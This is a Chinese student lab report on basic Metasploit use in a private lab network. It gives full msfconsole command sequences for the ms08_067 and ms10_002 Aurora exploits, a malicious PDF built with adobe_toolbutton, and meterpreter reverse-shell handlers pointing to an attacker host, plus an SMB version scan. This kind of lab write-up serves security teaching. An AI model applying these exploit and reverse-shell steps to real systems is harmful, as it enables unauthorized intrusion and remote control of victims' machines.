1. 程式人生 > >20155201 網絡攻防技術 實驗五 MSF基礎應用

20155201 網絡攻防技術 實驗五 MSF基礎應用

HR creat 5.5 frame CP 控制臺 基礎 ado 解釋

20155201 網絡攻防技術 實驗五 MSF基礎應用

一、實踐內容

  • 一個主動攻擊實踐,如ms08_067
  • 一個針對瀏覽器的攻擊,如ms11_050
  • 一個針對客戶端的攻擊,如Adobe
  • 成功應用任何一個輔助模塊

二、報告內容:

1. 基礎問題回答

1)用自己的話解釋什麽是exploit,payload,encode.

  1. exploit:把負責攻擊靶機的代碼或者程序傳送到靶機上
  2. payload:載荷,exploit傳送的內容
  3. encode:編碼方式,可以修改載荷的編碼方式讓載荷不容易被發現。

2. 實踐總結與體會

本次實驗的重點在於實踐,對於輔助模塊的了解、查看文檔、說明和使用,通過對msfconsolo命令的操作和使用,對其更加了解和熟練。

3. 實踐過程記錄

  1. 一個主動攻擊實踐,如ms08_067
  2. 一個針對瀏覽器的攻擊,如ms11_050
  3. 一個針對客戶端的攻擊,如Adobe
  4. 成功應用任何一個輔助模塊

一個主動攻擊實踐,如ms08_067

  1. 在kali終端中,輸入msfconsole以進入metasploit的控制臺

  2. 進入msfconsole中,在msf模式下查找與其相關的漏洞攻擊程序search ms08_067,看到exploit/windows/smb/ms08_067_netapi的信息
    技術分享圖片

  3. use exploit/windows/smb/ms08_067_netapi  \\使用模塊
    set payload generic/shell_reverse_tcp   \\設置載荷種類,通過反向連接來獲取shell的generic/shell_reverse_tcp當payload
    set LHOST 10.211.55.5
    set LPORT 5201
    set RHOST 10.211.55.12
    exploit
  4. 這裏攻擊失敗了
    技術分享圖片

想起來還沒ping過,ping了一下沒通,嘗試關閉Windows XP防火墻
技術分享圖片

技術分享圖片

技術分享圖片

  1. 攻擊成功,得到一個shell,查看系統信息
    技術分享圖片

一個針對瀏覽器的攻擊,如ms11_050

先選用ms11_050模塊,攻擊win7 ie8,結果ie停止工作。。
技術分享圖片
技術分享圖片

  1. 在msf模式下查找與其相關的漏洞攻擊程序search ms10_002,看到exploit/windows/browser/ms10_002_aurora的信息
    技術分享圖片

  2. 設置參數

msf exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
//payload => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/ms10_002_aurora) > set LHOST 10.211.55.5
//LHOST => 10.211.55.5
msf exploit(windows/browser/ms10_002_aurora) > set LPORT 5201
//LPORT => 5201
msf exploit(windows/browser/ms10_002_aurora) > set URIPATH lzw
//URIPATH => lzw
msf exploit(windows/browser/ms10_002_aurora) > exploit
  1. 使用exploit指令執行漏洞,可以看到生成了一個url:
    技術分享圖片

  2. 在當前會話輸入sessions -i, 4(具體數值是多少看自己的當前會話)成功獲取靶機的shell,可以對其進行操作

技術分享圖片

技術分享圖片

一個針對客戶端的攻擊,如adobe_toolbutton

  1. 同樣套路 ,先search adobe
  2. 設置參數
msf > use exploit/windows/fileformat/adobe_toolbutton
msf exploit(windows/fileformat/adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
//payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_toolbutton) > set LHOST 10.211.55.5
//LHOST => 10.211.55.5
msf exploit(windows/fileformat/adobe_toolbutton) > set LPORT 5201
//LPORT => 5201
msf exploit(windows/fileformat/adobe_toolbutton) > set FILENAME README.pdf
//FILENAME => README.pdf
  1. 之後查看一下相關設置
    技術分享圖片

  2. exploit一下

[*] Creating ‘README.pdf‘ file...
[+] README.pdf stored at /root/.msf4/local/README.pdf

記下來生成pdf的位置,直接cp拷出來,然後往xp裏面一拖

cp /root/.msf4/local/README.pdf ~
[*] exec: cp /root/.msf4/local/README.pdf ~
  1. 使用exploit/multi/handler模塊監聽xp
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
//payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.211.55.5
//LHOST => 10.211.55.5
msf exploit(multi/handler) > set LPORT 5201
//LPORT => 5201
msf exploit(multi/handler) > exploit
  1. 下載adobe reader,將拷貝出來的載荷pdf打開,回連成功
    技術分享圖片

成功應用任何一個輔助模塊

  1. metasploit模塊目錄裏面看看/usr/share/metasploit-framework/modules
  2. 先選個auxiliary/scanner/smb/smb_version,這個模塊的作用是掃描操作系統信息
    查看一下需要設置哪些參數:
    技術分享圖片

掃描範圍,線程數

  1. 設置參數,包括掃描範圍
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(scanner/smb/smb_version) > set threads 8
threads => 8
msf auxiliary(scanner/smb/smb_version) > run

[+] 10.211.55.6:445       - Host is running Windows 7 Professional SP1 (build:7601) (name:C3F2) (workgroup:WORKGROUP )
[*] 10.211.55.2:445       - Host could not be identified:  ()
[*] Scanned  26 of 256 hosts (10% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

掃描操作系統結果:windows 7 Professional SP1,用戶名C3F2
技術分享圖片

20155201 網絡攻防技術 實驗五 MSF基礎應用